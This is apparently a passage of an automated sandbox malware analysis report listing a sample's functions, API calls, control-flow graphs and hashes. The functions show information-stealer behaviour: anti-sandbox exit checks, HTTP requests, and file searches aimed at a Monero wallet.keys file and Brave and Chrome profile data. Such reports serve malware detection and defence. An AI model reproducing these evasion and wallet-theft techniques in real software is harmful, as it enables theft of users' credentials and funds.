                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2931873225-0
                                • Opcode ID: 69262e7203cfb903c2ec87e958661759a52543cc309e5eff15dd17fe1f6b9415
                                • Instruction ID: 99cbdc46a7953657644bab7c7e8b1cbb7f5dcdff0b453c0481b2641d3aac3b0e
                                • Opcode Fuzzy Hash: 69262e7203cfb903c2ec87e958661759a52543cc309e5eff15dd17fe1f6b9415
                                • Instruction Fuzzy Hash: EA314075D002089ADB09F7E0E856FEE77B8EF44340F04652AF512B2282DF715A43D7A6
                                Function 00ED6AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1436 ed6af3 1437 ed6b0a 1436->1437 1439 ed6b0c-ed6b22 call ed6920 call ed5b10 CloseHandle ExitProcess 1437->1439 1440 ed6aba-ed6ad7 call edaad0 OpenEventA 1437->1440 1445 ed6ad9-ed6af1 call edaad0 CreateEventA 1440->1445 1446 ed6af5-ed6b04 CloseHandle Sleep 1440->1446 1445->1439 1446->1437
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00ED6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00ED6AF9
                                • Sleep.KERNEL32(00001770), ref: 00ED6B04
                                • CloseHandle.KERNEL32(?,00000000,?,00DA8FB8,?,00EE110C,?,00000000,?,00EE1110,?,00000000,00EE0AEF), ref: 00ED6B1A
                                • ExitProcess.KERNEL32 ref: 00ED6B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 6c498f3da2f1c194b19db8a8799f3720a160a1f4dd82df2fffbbf472bd7abbe3
                                • Instruction ID: c3af2cf3e5977176c26fe426d813e8f010f909eca9c40797493384d06b2bc3ce
                                • Opcode Fuzzy Hash: 6c498f3da2f1c194b19db8a8799f3720a160a1f4dd82df2fffbbf472bd7abbe3
                                • Instruction Fuzzy Hash: F8F05E30940319ABEB20ABA0EC06BBD7B74EF04701F10A527F513B22C1DBF05682D756
                                Function 00EC47B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 62a520e64f37c5c7eb419843bcc0bc37bd966c6946183c60f4fb8c5957b06cfa
                                • Instruction ID: 113ca22984fcfc16d7159a5fd2c7e6875afb2ed7837b670e5c2e90abe710420e
                                • Opcode Fuzzy Hash: 62a520e64f37c5c7eb419843bcc0bc37bd966c6946183c60f4fb8c5957b06cfa
                                • Instruction Fuzzy Hash: 3B213EB1D00209ABDF14DFA4E845ADD7B74FF45320F148626F925B7281EB706A06CB91
                                Function 00ED51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,00DAE388,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction ID: 2cd4ac1931a053862da47214513487fd5b38d990b9214edd8ee62c2bc656c70c
                                • Opcode Fuzzy Hash: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction Fuzzy Hash: 75112131900148ABCB18FF60DD56EED73B8EF50300F44516AF81A66292EF70AB07C691
                                Function 00EC1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1493 ec1220-ec1247 call ed89b0 GlobalMemoryStatusEx 1496 ec1249-ec1271 call edda00 * 2 1493->1496 1497 ec1273-ec127a 1493->1497 1499 ec1281-ec1285 1496->1499 1497->1499 1501 ec129a-ec129d 1499->1501 1502 ec1287 1499->1502 1504 ec1289-ec1290 1502->1504 1505 ec1292-ec1294 ExitProcess 1502->1505 1504->1501 1504->1505
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00EC123E
                                • ExitProcess.KERNEL32 ref: 00EC1294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction ID: 7a803a1b611b289c94e5370dea8e0f6004e78349a33670d11223df9db4607408
                                • Opcode Fuzzy Hash: 55ddfa6102ad97908fad552aa2bb59df5b95bb2dd0aa7a41cf91ba7fd90f5aaf
                                • Instruction Fuzzy Hash: 1601A2B0D44308BAEB14EBD0CD49FADB7B8EF00705F208049F705B62C1D7B555428798
                                Function 00EC1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                • ExitProcess.KERNEL32 ref: 00EC1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction ID: 97ecfab70612d0551d4a9b12fa60fdbce998406d5db83f3bf98ef69f416d1f29
                                • Opcode Fuzzy Hash: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction Fuzzy Hash: 4BE08670D45308FBE7246BA0AD0AF0876B8AF04B02F104095F709771C1C6F526419798
                                Function 00EC10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EC10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EC10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction ID: ba7f5d838f066ffc66f19302fcd4a02512f7d3b569123accf21d9f852d1125a4
                                • Opcode Fuzzy Hash: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction Fuzzy Hash: 31F0E271A41308BBE7149AA4AD5AFABB7E8E709B15F302458F504E3280D5729F40CBA0
                                Function 00EC1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                • ExitProcess.KERNEL32 ref: 00EC11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction ID: a51dbd862047ad33d8b38f73b7a83e2f1fc62558b157d629c3f63c3559d9515c
                                • Opcode Fuzzy Hash: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction Fuzzy Hash: F2E0ECA5D1431152CA1873B4BD0AB2A32DC9B15349F08242ABA05A3247FA6AE8428665

                                Non-executed Functions

                                Function 00ED38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00ED38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED38E3
                                • lstrcat.KERNEL32(?,?), ref: 00ED3935
                                • StrCmpCA.SHLWAPI(?,00EE0F70), ref: 00ED3947
                                • StrCmpCA.SHLWAPI(?,00EE0F74), ref: 00ED395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED3C67
                                • FindClose.KERNEL32(000000FF), ref: 00ED3C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction ID: fb0125aa11bdbb7c468afaa646c2742b151785b7766c718a5c85c43658a17bf3
                                • Opcode Fuzzy Hash: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction Fuzzy Hash: 1EA151B2A003089BDB35DB64DC85FEA73B8FF88300F044599A51DA7145EBB19B85CF62
                                Function 00ECBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00EE0B32,00EE0B2B,00000000,?,?,?,00EE13F4,00EE0B2A), ref: 00ECBEF5
                                • StrCmpCA.SHLWAPI(?,00EE13F8), ref: 00ECBF4D
                                • StrCmpCA.SHLWAPI(?,00EE13FC), ref: 00ECBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECC7BF
                                • FindClose.KERNEL32(000000FF), ref: 00ECC7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction ID: d648c5f8a59ba8177503ff8557441d64b1b8b7e1567aa5f704a6e06a9f992579
                                • Opcode Fuzzy Hash: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
